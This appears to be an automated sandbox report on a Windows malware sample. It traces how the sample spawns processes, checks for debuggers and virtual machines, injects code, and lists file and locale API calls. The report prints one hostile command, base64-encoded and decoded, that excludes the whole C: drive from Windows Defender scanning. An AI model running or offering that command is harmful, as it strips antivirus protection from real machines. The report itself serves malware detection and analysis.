Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040D26E Sleep,ExitProcess,

17_2_0040D26E

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe TID: 5096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 6616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 3488	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

17_2_00416FC6

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6076			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1160			Jump to behavior

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW,

17_2_00406571

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

API call chain: ExitProcess graph end node

graph_17-45240

Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040620E FindFirstFileW,FindNextFileW,	17_2_0040620E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_004162EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040A3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044A569 FindFirstFileExA,	17_2_0044A569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_004187B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00406EEF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_0040CE58

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0043F394 mov eax, dword ptr fs:[00000030h]

17_2_0043F394

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00431347 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

17_2_00431347

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040F87E SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

17_2_0040F87E

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00431495 SetUnhandledExceptionFilter,	17_2_00431495
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00431347 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00431347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00438462 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00438462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043190C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_0043190C

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: Base64 decoded Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: Base64 decoded Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_00414EA8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe

17_2_0040FC77

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00415E25 mouse_event,

17_2_00415E25

Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager2ee70d
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	17_2_0044E084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	17_2_0044E1AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	17_2_0044E2B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044E381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoA,	17_2_0040D39C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_00444444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	17_2_0044492D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	17_2_0044DA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_0044DCC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_0044DD0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_0044DDA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044DE34

